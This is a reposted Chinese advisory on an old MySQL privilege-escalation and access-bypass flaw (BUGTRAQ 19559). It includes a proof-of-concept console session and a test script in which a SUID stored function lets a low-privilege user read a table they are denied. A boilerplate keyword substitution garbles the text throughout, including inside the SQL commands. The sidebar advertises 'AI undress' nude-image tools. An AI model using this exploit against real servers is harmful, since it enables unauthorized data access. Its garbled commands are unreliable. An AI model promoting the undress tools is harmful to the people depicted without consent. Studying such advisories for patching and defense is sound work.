MySQL权限提升与安全限制问题探讨
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。 受影响系统: MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合
以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。
受影响系统:
MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合)
描述:
BUGTRAQ ID: 19559
MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL(和PHP搭配之最佳组合)上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
<ol class="dp-xml"> <li class="alt"><span><span>$ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample </span></span></li> <li><span>Enter password: </span></li> <li class="alt"><span>Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g. </span></li> <li><span>Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database another; </span> </li> <li><span>ERROR 1044: Access denied for user 'sample'@'%' to database 'another' </span></li> <li class="alt"> <span>MySQL(和PHP搭配之最佳组合)</span><span class="tag">></span><span> create database sAmple; </span> </li> <li><span>Query OK, 1 row affected (0.00 sec) </span></li> </ol>
2、权限提升
<ol class="dp-xml"> <li class="alt"><span><span>--disable_warnings </span></span></li> <li><span>drop database if exists MySQL(和PHP搭配之最佳组合)test1; </span></li> <li class="alt"><span>drop database if exists MySQL(和PHP搭配之最佳组合)test2; </span></li> <li><span>drop function if exists f_suid; </span></li> <li class="alt"><span>--enable_warnings </span></li> <li><span># Prepare playground </span></li> <li class="alt"><span>create database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>create database MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span>create user malory@localhost; </span></li> <li><span>grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost; </span></li> <li class="alt"><span># Create harmless (but SUID!) function </span></li> <li><span>create function f_suid(i int) returns int return 0; </span></li> <li class="alt"><span>grant execute on function test.f_suid to malory@localhost; </span></li> <li><span>use MySQL(和PHP搭配之最佳组合)test2; </span></li> <li class="alt"><span># Create table in which malory@localhost will be interested but to which </span></li> <li><span># he won't have any access </span></li> <li class="alt"><span>create table t1 (i int); </span></li> <li><span>connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1); </span></li> <li class="alt"><span># Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1 </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select * from MySQL(和PHP搭配之最佳组合)test2.t1; </span></li> <li><span># Create function which will allow to exploit security hole </span></li> <li class="alt"><span>delimiter |; </span></li> <li><span>create function f_evil () </span></li> <li class="alt"><span>returns int </span></li> <li><span>sql security invoker </span></li> <li class="alt"><span>begin </span></li> <li> <span>set @</span><span class="attribute">a:</span><span>= </span><span class="attribute-value">current_user</span><span>(); </span> </li> <li class="alt"> <span>set @</span><span class="attribute">b:</span><span>= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1); </span> </li> <li><span>return 0; </span></li> <li class="alt"><span>end| </span></li> <li><span>delimiter ;| </span></li> <li class="alt"><span># Again correct </span></li> <li><span>--error ER_TABLEACCESS_DENIED_ERROR </span></li> <li class="alt"><span>select f_evil(); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span># Oops!!! it seems that f_evil() is executed in the context of </span></li> <li><span># f_suid() definer, so malory@locahost gets all info that he wants </span></li> <li class="alt"><span>select test.f_suid(f_evil()); </span></li> <li><span>select @a, @b; </span></li> <li class="alt"><span>connection default; </span></li> <li><span>drop user malory@localhost; </span></li> <li class="alt"><span>drop database MySQL(和PHP搭配之最佳组合)test1; </span></li> <li><span>drop database MySQL(和PHP搭配之最佳组合)test2; </span></li> </ol>
建议:
厂商补丁:MySQL(和PHP搭配之最佳组合) AB,目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3漢化版
中文版,非常好用

禪工作室 13.0.1
強大的PHP整合開發環境

Dreamweaver CS6
視覺化網頁開發工具

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

熱門話題

MySQL是一個開源的關係型數據庫管理系統。 1)創建數據庫和表:使用CREATEDATABASE和CREATETABLE命令。 2)基本操作:INSERT、UPDATE、DELETE和SELECT。 3)高級操作:JOIN、子查詢和事務處理。 4)調試技巧:檢查語法、數據類型和權限。 5)優化建議:使用索引、避免SELECT*和使用事務。

可以通過以下步驟打開 phpMyAdmin:1. 登錄網站控制面板;2. 找到並點擊 phpMyAdmin 圖標;3. 輸入 MySQL 憑據;4. 點擊 "登錄"。

MySQL是一種開源的關係型數據庫管理系統,主要用於快速、可靠地存儲和檢索數據。其工作原理包括客戶端請求、查詢解析、執行查詢和返回結果。使用示例包括創建表、插入和查詢數據,以及高級功能如JOIN操作。常見錯誤涉及SQL語法、數據類型和權限問題,優化建議包括使用索引、優化查詢和分錶分區。

選擇MySQL的原因是其性能、可靠性、易用性和社區支持。 1.MySQL提供高效的數據存儲和檢索功能,支持多種數據類型和高級查詢操作。 2.採用客戶端-服務器架構和多種存儲引擎,支持事務和查詢優化。 3.易於使用,支持多種操作系統和編程語言。 4.擁有強大的社區支持,提供豐富的資源和解決方案。

可在 Navicat 中通過以下步驟新建 MySQL 連接:打開應用程序並選擇“新建連接”(Ctrl N)。選擇“MySQL”作為連接類型。輸入主機名/IP 地址、端口、用戶名和密碼。 (可選)配置高級選項。保存連接並輸入連接名稱。

Redis 使用單線程架構,以提供高性能、簡單性和一致性。它利用 I/O 多路復用、事件循環、非阻塞 I/O 和共享內存來提高並發性,但同時存在並發性受限、單點故障和不適合寫密集型工作負載的局限性。

MySQL和SQL是開發者必備技能。 1.MySQL是開源的關係型數據庫管理系統,SQL是用於管理和操作數據庫的標準語言。 2.MySQL通過高效的數據存儲和檢索功能支持多種存儲引擎,SQL通過簡單語句完成複雜數據操作。 3.使用示例包括基本查詢和高級查詢,如按條件過濾和排序。 4.常見錯誤包括語法錯誤和性能問題,可通過檢查SQL語句和使用EXPLAIN命令優化。 5.性能優化技巧包括使用索引、避免全表掃描、優化JOIN操作和提升代碼可讀性。

直接從數據庫中恢復被刪除的行通常是不可能的,除非有備份或事務回滾機制。關鍵點:事務回滾:在事務未提交前執行ROLLBACK可恢復數據。備份:定期備份數據庫可用於快速恢復數據。數據庫快照:可創建數據庫只讀副本,在數據誤刪後恢復數據。慎用DELETE語句:仔細檢查條件,避免誤刪數據。使用WHERE子句:明確指定要刪除的數據。使用測試環境:在執行DELETE操作前進行測試。
